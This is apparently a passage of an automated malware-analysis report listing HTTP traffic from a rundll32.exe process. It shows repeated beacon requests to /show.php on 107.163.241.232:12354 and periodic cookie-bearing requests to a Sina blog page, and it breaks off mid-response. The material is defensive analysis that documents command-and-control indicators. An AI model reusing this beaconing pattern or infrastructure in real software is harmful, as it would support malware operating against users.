                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              20192.168.2.449895107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:24:50.870852947 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              21192.168.2.449896107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:24:51.397738934 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              22192.168.2.449910107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:24:52.603718042 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              23192.168.2.449912202.108.0.52806644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:24:52.711555958 CET214OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:24:54.279504061 CET371INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:24:54 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              24192.168.2.449913107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:24:52.711688042 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              25192.168.2.449930107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:24:54.843027115 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              26192.168.2.449932107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:24:54.955281973 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              27192.168.2.449947107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:24:56.846805096 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              28192.168.2.449949107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:24:56.850697041 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              29192.168.2.449950202.108.0.52806644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:24:56.850830078 CET214OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:24:58.345418930 CET371INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:24:58 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              30192.168.2.449969107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:24:59.011954069 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              31192.168.2.449971107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:24:59.116897106 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              32192.168.2.449985107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:00.617780924 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              33192.168.2.449987107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:00.726824045 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              34192.168.2.449988202.108.0.52806644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:00.727241039 CET214OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:25:02.299369097 CET371INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:25:02 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              35192.168.2.450005107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:02.856947899 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              36192.168.2.450008107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:02.980178118 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              37192.168.2.450024107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:04.621783972 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              38192.168.2.450026202.108.0.52806644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:04.734020948 CET214OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:25:06.308722973 CET371INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:25:06 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              39192.168.2.450027107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:04.734268904 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              40192.168.2.450046107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:06.862236977 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              41192.168.2.450048107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:06.995634079 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              42192.168.2.450064107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:08.616647959 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              43192.168.2.450066107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:08.731767893 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              44192.168.2.450067202.108.0.52806644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:08.732338905 CET214OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:25:10.304788113 CET371INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:25:10 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              45192.168.2.450086107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:10.876811981 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              46192.168.2.450088107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:10.992366076 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              47192.168.2.450104107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:12.633485079 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              48192.168.2.450106107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:12.742552996 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              49192.168.2.450107202.108.0.52806644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:12.744430065 CET214OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:25:14.316438913 CET371INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:25:14 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              50192.168.2.450129107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:14.871700048 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              51192.168.2.450131107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:14.991518974 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              52192.168.2.450147107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:16.647640944 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              53192.168.2.450150107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:16.767366886 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              54192.168.2.450151202.108.0.52806644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:16.767755032 CET214OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:25:18.348057032 CET371INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:25:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 160
                                              Connection: keep-alive
                                              Location: https://blog.sina.com.cn/u/5655029807
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              55192.168.2.450173107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:18.890381098 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              56192.168.2.450175107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:19.007800102 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              57192.168.2.450192107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:20.652548075 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              58192.168.2.450195107.163.241.232123546644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:20.769032001 CET184OUTGET /show.php HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                              Host: 107.163.241.232:12354
                                              Cache-Control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              59192.168.2.450196202.108.0.52806644C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 11, 2024 16:25:20.770831108 CET214OUTGET /u/5655029807 HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                              Host: blog.sina.com.cn
                                              Cookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
                                              Dec 11, 2024 16:25:22.352791071 CET371INHTTP/1.1 302 Moved Temporarily
                                              Server: nginx/1.2.8
                                              Date: Wed, 11 Dec 2024 15:25:22 GMT
